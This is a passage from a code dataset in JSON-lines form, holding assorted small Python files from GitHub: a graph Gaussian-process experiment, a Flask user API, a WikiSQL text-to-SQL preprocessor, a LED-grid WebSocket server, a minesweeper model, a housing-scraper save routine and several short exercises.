\"Photo\"]:\r\n dataset = datasets.Amazon(dataset_path, dataset_name)\r\nelif dataset_name in [\"Physics\", \"CS\"]:\r\n dataset = datasets.Coauthor(dataset_path, dataset_name)\r\nelif dataset_name in [\"Texas\", \"Cornell\", \"Wisconsin\"]:\r\n dataset = datasets.WebKB(dataset_path, dataset_name)\r\nelif dataset_name in [\"Chameleon\", \"Squirrel\"]:\r\n dataset = datasets.WikipediaNetwork(dataset_path, dataset_name)\r\nelif dataset_name in [\"Actor\", 'Film']:\r\n dataset = datasets.Actor(dataset_path, dataset_name)\r\ndata = dataset.data\r\n\r\n# use first mask if there are multiple\r\ntry:\r\n data.train_mask.size(1)\r\n data.train_mask, data.val_mask, data.test_mask = data.train_mask[:,parser.split], data.val_mask[:,parser.split], 
data.test_mask[:,parser.split]\r\nexcept:\r\n pass\r\n\r\nif parser.train_on_val:\r\n data.train_mask += data.val_mask\r\n \r\nfrom torch_geometric.utils import remove_self_loops\r\ndata.edge_index = remove_self_loops(data.edge_index)[0]\r\n\r\ndef get_fixed_splits(data, dataset_name, seed):\r\n with np.load(f'splits/{dataset_name}_split_0.6_0.2_{seed}.npz') as splits_file:\r\n train_mask = splits_file['train_mask']\r\n val_mask = splits_file['val_mask']\r\n test_mask = splits_file['test_mask']\r\n\r\n data.train_mask = torch.tensor(train_mask, dtype=torch.bool)\r\n data.val_mask = torch.tensor(val_mask, dtype=torch.bool)\r\n data.test_mask = torch.tensor(test_mask, dtype=torch.bool)\r\n '''\r\n if dataset_name in {'cora', 'citeseer', 'pubmed'}:\r\n data.train_mask[data.non_valid_samples] = False\r\n data.test_mask[data.non_valid_samples] = False\r\n data.val_mask[data.non_valid_samples] = False\r\n print(\"Non zero masks\", torch.count_nonzero(data.train_mask + data.val_mask + data.test_mask))\r\n print(\"Nodes\", data.x.size(0))\r\n print(\"Non valid\", len(data.non_valid_samples))\r\n else:\r\n assert torch.count_nonzero(data.train_mask + data.val_mask + data.test_mask) == data.x.size(0)\r\n '''\r\n return data\r\n\r\n#data = get_fixed_splits(data, parser.data.lower(), parser.split)\r\n\r\nif parser.base_kernel == 'Polynomial':\r\n base_kernel = gpflow.kernels.Polynomial()\r\nelif parser.base_kernel == 'Matern12':\r\n base_kernel = gpflow.kernels.Matern12()\r\nelif parser.base_kernel == 'Matern32':\r\n base_kernel = gpflow.kernels.Matern32()\r\nelif parser.base_kernel == 'Matern52':\r\n base_kernel = gpflow.kernels.Matern52()\r\nelif parser.base_kernel == 'SquaredExponential':\r\n base_kernel = gpflow.kernels.SquaredExponential()\r\n\r\nfrom kernels import SheafGGP, SheafChebyshev, SheafGGP_t\r\n\r\n#global top_test_acc\r\ntest_accs = []\r\n\r\ndef step_callback(step, variables=None, values=None):\r\n pred = tf.math.argmax(m.predict_f(tf.cast(np.where(data.test_mask)[0].reshape(-1,1), dtype = tf.float64))[0], axis = 1)\r\n correct = np.sum(pred == data.y[data.test_mask])\r\n test_acc = 100.*correct/np.sum(data.test_mask.numpy())\r\n if step % 20 == 0:\r\n pred = tf.math.argmax(m.predict_f(tf.cast(np.where(data.val_mask)[0].reshape(-1,1), dtype = tf.float64))[0], axis = 1)\r\n correct = np.sum(pred == data.y[data.val_mask])\r\n val_acc = 100.*correct/np.sum(data.val_mask.numpy())\r\n print('Epoch = {}, elbo = {:.2f}, val acc = {:.2f}, test acc = {:.2f}'.format(step, m.elbo().numpy(), val_acc, test_acc))\r\n #print_summary(m)\r\n test_accs.append(test_acc)\r\n\r\ndef optimize_tf(model, step_callback, lr=0.01):\r\n opt = tf.optimizers.Adam(lr=lr)\r\n elbos = []\r\n for epoch_idx in range(parser.epoch):\r\n with tf.GradientTape(watch_accessed_variables=False) as tape:\r\n tape.watch(model.trainable_variables)\r\n loss = model.training_loss()\r\n gradients = tape.gradient(loss, model.trainable_variables)\r\n opt.apply_gradients(zip(gradients, model.trainable_variables))\r\n step_callback(epoch_idx)\r\n elbos.append(model.elbo())\r\n #return elbos\r\n \r\nif __name__ == '__main__':\r\n test_accs10 = []\r\n for split in range(0,10):\r\n print('Split', split)\r\n data = get_fixed_splits(data, parser.data.lower(), split)\r\n if parser.train_on_val:\r\n data.train_mask += data.val_mask\r\n split_acc = []\r\n for _ in range(3):\r\n test_accs = []\r\n if parser.approx:\r\n kernel = SheafChebyshev(parser.approx_deg, data.x, data.edge_index, base_kernel)\r\n elif parser.act == 'relu':\r\n kernel = 
SheafGGP(data, base_kernel=base_kernel)\r\n            elif parser.act == 'tanh':\r\n                kernel = SheafGGP_t(data, base_kernel=base_kernel)\r\n            n_class = data.y.numpy().max()+1\r\n            invlink = gpflow.likelihoods.RobustMax(n_class) # Robustmax inverse link function\r\n            likelihood = gpflow.likelihoods.MultiClass(n_class, invlink=invlink) # Multiclass likelihood\r\n            m = gpflow.models.VGP(\r\n                (tf.cast(np.where(data.train_mask)[0].reshape(-1,1), dtype = tf.float64), tf.reshape(data.y[data.train_mask], (-1,1))),\r\n                likelihood=likelihood, \r\n                kernel=kernel, \r\n                num_latent_gps=n_class\r\n            )\r\n            #print_summary(m)\r\n            optimize_tf(m, step_callback, lr = parser.lr)\r\n            split_acc.append(max(test_accs))\r\n\r\n        test_accs10.append(max(split_acc))\r\n        print('split = {}, acc = {}'.format(split, max(split_acc)))\r\n    print(test_accs10)\r\n    print('Mean:', np.mean(test_accs10), 'sd', np.std(test_accs10))","repo_name":"yincong-zhi/Sheaf-Laplacian-GP","sub_path":"sheaf_gp_nsd.py","file_name":"sheaf_gp_nsd.py","file_ext":"py","file_size_in_byte":6973,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"25324093705","text":"from flask import Blueprint, request\nfrom model.user import User\nfrom service.user_service import UserService\nfrom exception.invalid_parameter import InvalidParameterError\n\nuc = Blueprint('user_controller', __name__)\nuser_service = UserService()\n\n\n@uc.route('/users')\ndef get_all_users():\n    return {\n        \"users\": user_service.get_all_users()  # a list of dictionaries\n    }\n\n\n@uc.route('/users/<username>')\ndef get_user_by_username(username):\n    try:\n        return user_service.get_user_by_username(username)  # dictionary\n    except KeyError as e:\n        return {\n            \"message\": f\"User with username {username} was not found!\"\n        }, 404\n\n\n@uc.route('/users', methods=['POST'])\ndef add_user():\n    user_json_dictionary = request.get_json()\n    user_object = User(user_json_dictionary['username'], user_json_dictionary['mobile_phone'])\n    try:\n        return user_service.add_user(user_object), 201  # Dictionary representation of the newly added user\n        # 201 created\n    except InvalidParameterError as e:\n        return {\n            \"message\": str(e)\n        }, 400\n\n\n@uc.route('/users/<username>', methods=['PUT'])\ndef edit_user_by_username(username):\n    user_json_dictionary = request.get_json()\n    user_object = User(user_json_dictionary['username'], user_json_dictionary['mobile_phone'])\n    return user_service.edit_user_by_username(username, user_object)\n","repo_name":"220613-pwa-ext/training","sub_path":"week-2/day-4/todo-management-app/controller/user_controller.py","file_name":"user_controller.py","file_ext":"py","file_size_in_byte":1394,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"27"} +{"seq_id":"33339416765","text":"from math import sin, cos, sqrt, atan2, radians\r\n\r\n\r\ndef distance(lat1, lon1, lat2, lon2):\r\n    R = 6373.0  # approximate Earth radius in km\r\n\r\n    lat1 = radians(lat1)\r\n    lon1 = radians(lon1)\r\n    lat2 = radians(lat2)\r\n    lon2 = radians(lon2)\r\n\r\n    dlon = lon2 - lon1\r\n    dlat = lat2 - lat1\r\n\r\n    arc = sin(dlat / 2)**2 + cos(lat1) * cos(lat2) * sin(dlon / 2)**2\r\n    dips = atan2(sqrt(arc), sqrt(1 - arc))\r\n    dips *= 2\r\n\r\n    return dips * R\r\n\r\ndef format_dist(km):\r\n    if km < 1:\r\n        return '{0} m'.format(int(km * 1000))\r\n\r\n    if km < 10:\r\n        km = \"%.2f\" % km\r\n        return '{0} km'.format(km.replace(\".\", \",\"))\r\n\r\n    
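# examples: format_dist(0.25) -> '250 m'; format_dist(3.456) -> '3,46 km'\r\n    # (comma as decimal separator); format_dist(42.7) -> '42 km'\r\n    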
return '{0} km'.format(int(km))","repo_name":"aureliancnx/easink","sub_path":"easink/utils/math_utils.py","file_name":"math_utils.py","file_ext":"py","file_size_in_byte":647,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"21051230371","text":"# -*- coding: utf-8 -*-\nimport time\nfrom pinpong.board import Board,Pin\n\nip = \"192.168.1.116\"\nport = 8081\n\nBoard(ip, port)\n\nbtn = Pin(Pin.D8, Pin.IN)\n\ndef btn_rasing_handler(pin):# interrupt event callback\n    print(\"\\n--rising---\")\n    print(\"pin = \", pin)\n    \ndef btn_falling_handler(pin):# interrupt event callback\n    print(\"\\n--falling---\")\n    print(\"pin = \", pin)\n\ndef btn_both_handler(pin):# interrupt event callback\n    print(\"\\n--both---\")\n    print(\"pin = \", pin)\n\nbtn.irq(trigger=Pin.IRQ_FALLING, handler=btn_falling_handler) # trigger the interrupt on the falling edge\n#btn.irq(trigger=Pin.IRQ_RISING, handler=btn_rasing_handler) # trigger the interrupt on the rising edge, with its callback\n#btn.irq(trigger=Pin.IRQ_RISING+Pin.IRQ_FALLING, handler=btn_both_handler) # trigger the interrupt on any level change\n\nwhile True:\n    time.sleep(1)\n","repo_name":"milkv-duo/duo-buildroot-sdk","sub_path":"buildroot-2021.05/package/python-pinpong/pinpong/examples/PinPong Board/example/tcp_example/1-05-irq.py","file_name":"1-05-irq.py","file_ext":"py","file_size_in_byte":825,"program_lang":"python","lang":"en","doc_type":"code","stars":174,"dataset":"github-code","pt":"27"} +{"seq_id":"28767947294","text":"T = int(input())\r\nfor _ in range(T):\r\n    VPS = input()\r\n    cnt = 0\r\n    for i in VPS:\r\n        if i == '(':\r\n            cnt +=1\r\n        elif i ==')':\r\n            cnt -=1\r\n        if cnt < 0:\r\n            break\r\n    if cnt == 0:\r\n        print('YES')\r\n    else:\r\n        print('NO')\r\n","repo_name":"inho3213/ALGORITHM","sub_path":"백준/Silver/9012. 괄호/괄호.py","file_name":"괄호.py","file_ext":"py","file_size_in_byte":244,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"26223866429","text":"import numpy as np\nimport src.utils.utils as utils\nimport scipy.sparse as ssp\n\nimport moz_sp.sql_tokenizer as sql_tokenizer\nfrom src.data_processor.processor_utils import get_table_aware_transformer_encoder_inputs\nfrom src.data_processor.processor_utils import get_transformer_output_value_mask\nfrom src.data_processor.processor_utils import Text2SQLExample\nfrom src.data_processor.processor_utils import START_TOKEN, EOS_TOKEN, NUM_TOKEN, STR_TOKEN\nfrom src.data_processor.vocab_utils import functional_tokens\nimport src.data_processor.tokenizers as tok\nimport src.data_processor.vectorizers as vec\nfrom src.utils.utils import BRIDGE, is_number\n\nRESERVED_TOKEN_TYPE = sql_tokenizer.RESERVED_TOKEN\n\n\ndef preprocess_example(split, example, args, parsed_programs, text_tokenize, program_tokenize, post_process,\n                       table_utils, schema_graph, vocabs, verbose=False):\n    tu = table_utils\n    text_vocab = vocabs['text']\n    program_vocab = vocabs['program']\n\n    def get_memory_values(features, raw_text, args):\n        if args.pretrained_transformer.startswith('bert-') and args.pretrained_transformer.endswith('-uncased'):\n            return utils.restore_feature_case(features, raw_text, tu)\n        else:\n            return features\n\n    def get_text_schema_adjacency_matrix(text_features, s_M):\n        schema_size = s_M.shape[0]\n        text_size = len(text_features)\n        full_size = schema_size + text_size\n        M = ssp.lil_matrix((full_size, full_size), dtype=np.int)\n        M[-schema_size:, -schema_size:] = s_M\n        return M\n\n    # sanity check\n    ############################\n    query_oov = False\n    denormalized = False\n    schema_truncated = False\n    token_restored = True\n    ############################\n\n    # Text 
feature extraction and set program ground truth list\n if isinstance(example, Text2SQLExample):\n if args.pretrained_transformer:\n text_features = text_tokenize(example.text)\n text_tokens, token_starts, token_ends = get_memory_values(text_features, example.text, args)\n if not token_starts:\n token_restored = False\n else:\n text_tokens = text_tokenize(example.text, functional_tokens)\n text_features = [t.lower() for t in text_tokens]\n example.text_tokens = text_features\n example.text_ptr_values = text_tokens\n example.text_token_starts = token_starts\n example.text_token_ends = token_ends\n example.text_ids = vec.vectorize(text_features, text_vocab)\n example.text_ptr_input_ids = vec.vectorize(text_features, text_vocab)\n program_list = example.program_list\n example.values = [(schema_graph.get_field(cond[0]).signature, cond[2])\n for cond in example.program_ast_list_[0]['conds']\n if (isinstance(cond[2], str) and not is_number(cond[2]))]\n else:\n text_tokens = example.example.text_ptr_values\n text_features = example.example.text_tokens\n program_list = example.example.program_list\n\n # Schema feature extraction\n if args.model_id in [BRIDGE]:\n question_encoding = example.text if args.use_picklist else None\n tables = sorted([schema_graph.get_table_id(t_name) for t_name in example.gt_table_names]) \\\n if args.use_oracle_tables else None\n table_po, field_po = schema_graph.get_schema_perceived_order(tables)\n schema_features, matched_values = schema_graph.get_serialization(\n tu, flatten_features=True, table_po=table_po, field_po=field_po,\n use_typed_field_markers=args.use_typed_field_markers, use_graph_encoding=args.use_graph_encoding,\n question_encoding=question_encoding, top_k_matches=args.top_k_picklist_matches,\n num_values_per_field=args.num_values_per_field, no_anchor_text=args.no_anchor_text)\n example.matched_values = matched_values\n example.input_tokens, example.input_ptr_values, num_excluded_tables, num_excluded_fields = \\\n get_table_aware_transformer_encoder_inputs(text_tokens, text_features, schema_features, table_utils)\n schema_truncated = (num_excluded_fields > 0)\n num_included_nodes = schema_graph.get_num_perceived_nodes(table_po) + 1 - num_excluded_tables - num_excluded_fields\n example.ptr_input_ids = vec.vectorize(example.input_tokens, text_vocab)\n if args.read_picklist:\n example.transformer_output_value_mask, value_features, value_tokens = \\\n get_transformer_output_value_mask(example.input_tokens, matched_values, tu)\n example.primary_key_ids = schema_graph.get_primary_key_ids(num_included_nodes, table_po=table_po, field_po=field_po)\n example.foreign_key_ids = schema_graph.get_foreign_key_ids(num_included_nodes, table_po=table_po, field_po=field_po)\n example.field_type_ids = schema_graph.get_field_type_ids(num_included_nodes, table_po=table_po, field_po=field_po)\n example.table_masks = schema_graph.get_table_masks(num_included_nodes, table_po=table_po, field_po=field_po)\n example.field_table_pos = schema_graph.get_field_table_pos(num_included_nodes, table_po=table_po, field_po=field_po)\n example.schema_M = schema_graph.adj_matrix\n example.M = get_text_schema_adjacency_matrix(text_features, example.schema_M)\n else:\n num_included_nodes = schema_graph.num_nodes\n\n # Value copy feature extraction\n if args.read_picklist:\n constant_memory_features = text_features + value_features\n constant_memory = text_tokens + value_tokens\n example.text_ptr_values = constant_memory\n else:\n constant_memory_features = text_features\n constant_ptr_value_ids, 
constant_unique_input_ids = vec.vectorize_ptr_in(constant_memory_features, program_vocab)\n if isinstance(example, Text2SQLExample):\n example.text_ptr_value_ids = constant_ptr_value_ids\n example.ptr_value_ids = constant_ptr_value_ids + [program_vocab.size + len(constant_memory_features) + x\n for x in range(num_included_nodes)]\n\n if not args.leaderboard_submission:\n for j, program in enumerate(program_list):\n if isinstance(example, Text2SQLExample):\n # Model II. Bridge output\n program_singleton_field_tokens, program_singleton_field_token_types = \\\n tok.wikisql_struct_to_tokens(example.program_ast_, schema_graph, tu)\n program_singleton_field_tokens = [START_TOKEN] + program_singleton_field_tokens + [EOS_TOKEN]\n program_singleton_field_token_types = \\\n [RESERVED_TOKEN_TYPE] + program_singleton_field_token_types + [RESERVED_TOKEN_TYPE]\n example.program_singleton_field_tokens_list.append(program_singleton_field_tokens)\n example.program_singleton_field_token_types_list.append(program_singleton_field_token_types)\n program_singleton_field_input_ids = vec.vectorize_singleton(\n program_singleton_field_tokens, program_singleton_field_token_types, program_vocab)\n example.program_singleton_field_input_ids_list.append(program_singleton_field_input_ids)\n else:\n # Model II. Bridge output\n example.program_singleton_field_input_ids_list.append(\n example.example.program_singleton_field_input_ids_list[j])\n program_singleton_field_tokens = example.example.program_singleton_field_tokens_list[j]\n program_singleton_field_token_types = example.example.program_singleton_field_token_types_list[j]\n\n program_field_ptr_value_ids = vec.vectorize_field_ptr_out(program_singleton_field_tokens,\n program_singleton_field_token_types,\n program_vocab,\n constant_unique_input_ids,\n max_memory_size=len(constant_memory_features),\n schema=schema_graph,\n num_included_nodes=num_included_nodes)\n example.program_text_and_field_ptr_value_ids_list.append(program_field_ptr_value_ids)\n\n table_ids = [schema_graph.get_table_id(table_name) for table_name in example.gt_table_names_list[j]]\n example.table_ids_list.append(table_ids)\n assert ([schema_graph.get_table(x).name for x in table_ids] == example.gt_table_names)\n\n # sanity check\n ############################\n # NL+Schema pointer output contains tokens that does not belong to any of the following categories\n if verbose:\n if program_vocab.unk_id in program_field_ptr_value_ids:\n unk_indices = [i for i, x in enumerate(program_field_ptr_value_ids) if x == program_vocab.unk_id]\n print('OOV II: {}'.format(' '.join([program_singleton_field_tokens[i] for i in unk_indices])))\n example.pretty_print(schema=schema_graph,\n de_vectorize_ptr=vec.de_vectorize_ptr,\n de_vectorize_field_ptr=vec.de_vectorize_field_ptr,\n rev_vocab=program_vocab,\n post_process=post_process,\n use_table_aware_te=(args.model_id in [BRIDGE]))\n query_oov = True\n if program_vocab.unk_field_id in program_field_ptr_value_ids:\n example.pretty_print(schema=schema_graph,\n de_vectorize_ptr=vec.de_vectorize_ptr,\n de_vectorize_field_ptr=vec.de_vectorize_field_ptr,\n rev_vocab=program_vocab,\n post_process=post_process,\n use_table_aware_te=(args.model_id in [BRIDGE]))\n if program_vocab.unk_table_id in program_field_ptr_value_ids:\n example.pretty_print(schema=schema_graph,\n de_vectorize_ptr=vec.de_vectorize_ptr,\n de_vectorize_field_ptr=vec.de_vectorize_field_ptr,\n rev_vocab=program_vocab,\n post_process=post_process,\n use_table_aware_te=(args.model_id in [BRIDGE]))\n 
############################\n\n # Store the ground truth queries after preprocessing to run a relaxed evaluation or\n # to evaluate with partial queries\n if split == 'dev':\n input_tokens = text_tokens\n if args.model_id in [BRIDGE]:\n _p = vec.de_vectorize_field_ptr(program_field_ptr_value_ids, program_vocab, input_tokens,\n schema=schema_graph, post_process=post_process)\n else:\n _p = program\n example.gt_program_list.append(_p)\n\n # sanity check\n ############################\n # try:\n # assert(equal_ignoring_trivial_diffs(_p, program.lower(), verbose=True))\n # except Exception:\n # print('_p:\\t\\t{}'.format(_p))\n # print('program:\\t{}'.format(program))\n # print()\n # import pdb\n # pdb.set_trace()\n ############################\n\n example.run_unit_tests()\n\n return query_oov, denormalized, schema_truncated, token_restored\n","repo_name":"salesforce/TabularSemanticParsing","sub_path":"src/data_processor/processors/data_processor_wikisql.py","file_name":"data_processor_wikisql.py","file_ext":"py","file_size_in_byte":11946,"program_lang":"python","lang":"en","doc_type":"code","stars":206,"dataset":"github-code","pt":"27"} +{"seq_id":"7789334191","text":"#!/usr/local/bin/python3.4\n# -*- coding: utf-8 -*-\n\n# Read the README.md for a basic understanding of the server API.\n\n# import python libs\nimport json\nimport asyncio\nimport socket\nfrom autobahn.asyncio.websocket import WebSocketServerProtocol\nfrom autobahn.asyncio.websocket import WebSocketServerFactory\n\n# import project libs\nimport config\nfrom issetHelper import IssetHelper\nfrom colorController import ColorController\n\n\n\n# This is a autobahn based web socket protocol for the AmbiGrid API.\n# Read the README.md file to get an understanding of the API\nclass WebSocketProtocol(WebSocketServerProtocol, IssetHelper):\n\n def onOpen(self):\n if self.beVerbose: print('WebSocket connection open.')\n\n def onConnect(self, request):\n if self.beVerbose: print('\\nClient connecting: {}'.format(request.peer))\n self.animationController.setWebSocketHandler(self)\n\n def onClose(self, wasClean, code, reason):\n if self.beVerbose: print('\\nWebSocket connection closed: {}'.format(reason))\n self.animationController.unsetWebSocketHandler(self)\n\n def onMessage(self, payload, isBinary):\n if isBinary:\n return\n\n stringMessage = payload.decode('utf8')\n response = {}\n\n try:\n jsonMessage = json.loads(stringMessage)\n response = self.processRequest(jsonMessage)\n except ValueError:\n response = self.statusRequest()\n\n self.sendDictionary(response)\n\n def sendDictionary(self, dictionary):\n responsAsJsonString = json.dumps(dictionary, ensure_ascii=False)\n self.sendMessage(responsAsJsonString.encode('utf8'))\n\n def setReferences(self, bridge, animationController, verbose):\n self.bridge = bridge\n self.animationController = animationController\n self.colors = ColorController\n self.beVerbose = verbose\n\n def processRequest(self, requestData):\n response = {}\n\n if requestData['action'] == 'setAnimation':\n self.setAnimationRequest(requestData)\n elif requestData['action'] == 'setFadeOut':\n self.setFadeOutRequest(requestData)\n elif requestData['action'] == 'stopFadeOut':\n self.stopFadeOutRequest()\n elif requestData['action'] == 'setBaseColor':\n self.setColorRequest(requestData)\n\n response = self.statusRequest(requestData)\n\n return response\n\n def statusRequest(self, requestData = None):\n if (self.isset(requestData, 'details') and\n requestData['details'] == True):\n return 
self.animationController.getAllStati()\n else:\n return self.animationController.getStatus()\n\n def setAnimationRequest(self, requestData):\n if self.isset(requestData, 'name'):\n self.animationController.showAnimation(requestData)\n\n def setFadeOutRequest(self, requestData):\n time = self.saveIntConvert(requestData['seconds'])\n if time > 0:\n self.animationController.setFadeOut(time)\n\n def stopFadeOutRequest(self):\n self.animationController.stopFadeOut()\n\n def setColorRequest(self, requestData):\n colorType = requestData['type']\n\n if colorType == 'hex' and self.isInt(requestData['value'], 16):\n return self.colors.setBasisColorAsHex(int(requestData['value'], 16))\n\n elif colorType == 'rgb':\n return self.setRgbColorRequest(requestData)\n\n elif colorType == 'hsl':\n return self.setHslColorRequest(requestData)\n\n def setRgbColorRequest(self, requestData):\n try:\n redValue = int(requestData['red'])\n greenValue = int(requestData['green'])\n blueValue = int(requestData['blue'])\n except (ValueError, TypeError):\n return\n\n if (redValue >= 0 and redValue <= 255 and\n greenValue >= 0 and greenValue <= 255 and\n blueValue >= 0 and blueValue <= 255):\n self.colors.setBasisColorAsRgb(redValue, greenValue, blueValue)\n\n def setHslColorRequest(self, requestData):\n try:\n hue = float(requestData['hue'])\n saturation = float(requestData['saturation'])\n lightness = float(requestData['lightness'])\n except (ValueError, TypeError):\n return\n\n if (hue >= 0 and hue <= 1 and\n saturation >= 0 and saturation <= 1 and\n lightness >= 0 and lightness <= 1):\n self.colors.setBasisColorAsHsl(hue, saturation, lightness)\n\n\n\nclass AmbiGridNetworking():\n\n def __init__(self, wsPort, lightAnimationController, verbose = False):\n # initializations\n self.port = wsPort\n self.animationController = lightAnimationController\n self.beVerbose = verbose\n\n # prepare the web socket protocol\n webSocketProtocol = WebSocketProtocol\n webSocketProtocol.setReferences(\n webSocketProtocol, self, self.animationController, self.beVerbose)\n\n # prepare the web sockets\n factory = WebSocketServerFactory()\n factory.protocol = webSocketProtocol\n\n # get the host's IP\n if config.AUTO_DETECT_HOST_IP:\n host = socket.gethostbyname(socket.gethostname())\n else:\n host = config.HOST_IP\n\n # start the server event loop\n loop = asyncio.get_event_loop()\n coro = loop.create_server(factory, host, self.port)\n wsServer = loop.run_until_complete(coro)\n\n try:\n if self.beVerbose:\n serverAddressString = host + ':' + str(self.port)\n print('WS sever: launched at', serverAddressString)\n loop.run_forever()\n except KeyboardInterrupt:\n pass\n finally:\n wsServer.close()\n loop.close()\n","repo_name":"RGreinacher/AmbiGrid","sub_path":"system/networkInterface.py","file_name":"networkInterface.py","file_ext":"py","file_size_in_byte":5800,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"10020016505","text":"import pygame\r\n\r\n\r\nclass Wall:\r\n\r\n def __init__(self, CellSim, x, y, width, height):\r\n self.CellSim = CellSim\r\n self.settings = CellSim.settings\r\n self.screen = CellSim.screen\r\n self.pos = x + y * self.settings.gridCollumns\r\n self.width = width\r\n self.height = height\r\n self.grid = CellSim.grid\r\n self.rects = []\r\n self.make()\r\n \r\n \r\n\r\n def make(self):\r\n pos = self.pos\r\n for y in range(0, self.height):\r\n for x in range(0, self.width):\r\n rect = pygame.Rect(0, 0, self.grid.intervalCol, self.grid.intervalRow)\r\n point 
= self.grid.points[pos]\r\n                rect.center = point.x, point.y\r\n                self.rects.append(rect)\r\n                pos += 1\r\n            pos += self.settings.gridCollumns - 1\r\n\r\n    def run(self):\r\n        color = 0, 0, 0\r\n        for rect in self.rects:\r\n            pygame.draw.rect(self.screen, color, rect)","repo_name":"BertHert/CellSim","sub_path":"Walls.py","file_name":"Walls.py","file_ext":"py","file_size_in_byte":981,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"}
+{"seq_id":"11691270462","text":"python_lugati = {\n    'int' : 'butun son toifasi',\n    'float' : '10 li son toifasi',\n    'string' : 'matn toifasi',\n    'if' : 'agar',\n    'elif' : 'aksincha agar',\n    'else' : 'aksincha',\n    'insert' : 'kiritish',\n    'append' : 'qo\\'shib qo\\'yish',\n    'del' : 'o\\'chirish',\n    'print' : 'chiqarish'\n}\n\nkalit = input(\"\\nKalit so'z kiriting! >>> \").lower()\ntarjima = python_lugati.get(kalit)\n\n# print(python_lugati.get(kalit, \"Bunday so'z mavjud emas\"))\n\nif tarjima == None:\n    print(\"Bunday so'z mavjud emas\")\nelse :\n    print(f\"{kalit.title()} so'zi {tarjima} deb tarjima qilinadi\")","repo_name":"Azamat2400/python_darslari","sub_path":"14-dars_lug'at/python_lug'ati.py","file_name":"python_lug'ati.py","file_ext":"py","file_size_in_byte":589,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"}
+{"seq_id":"31402412430","text":"# Model\r\n\r\nimport random\r\n\r\nclass Polje:\r\n    def __init__(self, vrstice, stolpci, stevilo_min):\r\n        self.vrstice = vrstice\r\n        self.stolpci = stolpci\r\n        self.stevilo_min = stevilo_min\r\n    \r\n    def __repr__(self):\r\n        vrstice, stolpci, stevilo_min = self.podatki()\r\n        return ('{}(vrstice={}, stolpci={}, stevilo min={})'.format(self.__class__.__name__,\r\n             vrstice, stolpci, stevilo_min))\r\n\r\n    def podatki(self):\r\n        return self.vrstice, self.stolpci, self.stevilo_min\r\n\r\n    def matrika(self):\r\n        matrika = [[0 for j in range(self.stolpci)] for i in range(self.vrstice)]\r\n        return matrika\r\n\r\n    def postavi_mine(self):\r\n        stevilo_min = self.stevilo_min\r\n        matrika_z_minami = self.matrika()\r\n        if stevilo_min > self.vrstice * self.stolpci:\r\n            return None # when calling this, check that the result is not None\r\n        else:\r\n            while stevilo_min > 0:\r\n                nakljucna_vrstica = random.randint(0, self.vrstice - 1)\r\n                nakljucen_stolpec = random.randint(0, self.stolpci - 1)\r\n                if matrika_z_minami[nakljucna_vrstica][nakljucen_stolpec] == 0:\r\n                    matrika_z_minami[nakljucna_vrstica][nakljucen_stolpec] = 1\r\n                    stevilo_min -= 1\r\n            return matrika_z_minami\r\n\r\n    def sosede(self, i, j, matrika):\r\n        sosede = 0\r\n        for vrstica in range(i-1, i+2):\r\n            for stolpec in range(j-1, j+2):\r\n                if (vrstica == i) and (stolpec == j): # a cell is not its own neighbour\r\n                    continue\r\n                if ((vrstica < 0) or (vrstica > self.vrstice-1) or (stolpec < 0) or (stolpec > self.stolpci-1)):\r\n                    # we are outside the matrix\r\n                    continue\r\n                if matrika[vrstica][stolpec] == 1: # a mine\r\n                    sosede += 1 \r\n        return sosede\r\n    \r\n    \r\n\r\n","repo_name":"enejkovac/Minolovec","sub_path":"Minolovec_model.py","file_name":"Minolovec_model.py","file_ext":"py","file_size_in_byte":1902,"program_lang":"python","lang":"sl","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"}
+{"seq_id":"6576905460","text":"import os\nimport simplejson as json\nimport pandas as pd\n\ndef save(Search_KeyWord, project_name, project_name_link, Image_Link, Image_Link_Name, Project_Location, Project_Location_Redirect_Line\n         , price_range, Built_Up_Area, EMI, RERA, Marketed_by, Owner_name,\n         Owner_link, Owner_type, Description, NearBy_Facility):\n    print(\"In a file \"+ Search_KeyWord)\n    count, n_count = 0, 0\n    n1 = []\n    #NearBy to
JSON\n    for i in NearBy_Facility:\n        n_count = n_count + 1\n        n1.append({\"N_Id\": n_count, \"Name\": i})\n    #print(n1[0])\n\n    if os.path.isfile(\"./Housing_json/housing_\" + Search_KeyWord + \".json\") and os.stat(\"./Housing_json/housing.json\").st_size != 0:\n        print(\"Exists\")\n        #old_file = open(\"./housing_\" + Search_KeyWord + \".json\", \"r+\")\n        #d = json.loads(old_file.read())\n    else:\n        count = 0\n        d = []\n    old_file = open(\"./Housing_json/housing_\" + Search_KeyWord + \".json\", \"w+\")\n    print(\"Opening the File\")\n    print(\"Converting to JSON\")\n    for i in range(len(project_name)):\n        count = count + 1\n        print(\"Appending the \" + str(i) + \" value\")\n        d.append({\"Id\": count,\n                  \"Project_Name\": project_name[i],\n                  \"Project_Name_Link\": project_name_link[i],\n                  \"Image_Link\" : Image_Link[i],\n                  \"Image_Link_Name\": Image_Link_Name[i],\n                  \"Project_Location\": Project_Location[i],\n                  \"Project_Location_Redirect_Line\": Project_Location_Redirect_Line[i],\n                  \"Price_Range\": price_range[i],\n                  \"Built_Up_Area\": Built_Up_Area[i],\n                  \"EMI\": EMI[i],\n                  \"Rera\": RERA[i],\n                  \"Marketed_by\": Marketed_by[i],\n                  \"Owner_name\": Owner_name[i],\n                  \"Owner_link\": Owner_link[i],\n                  \"Owner_type\": Owner_type[i],\n                  \"Description\": Description[i],\n                  \"NearBy_Facility\": n1[i]})\n\n    print(\"Writing to File\")\n    old_file.seek(0)\n    old_file.write(json.dumps(d))\n    print(\"Successfully Completed\")\n    print(\"Writing to CSV File\")\n    df = pd.DataFrame(d)\n    df.to_csv(\"./Housing_csv/housing_\" + Search_KeyWord + \".csv\", index=False)\n\n\n","repo_name":"Avilashj34/Web-Scraping","sub_path":"Web 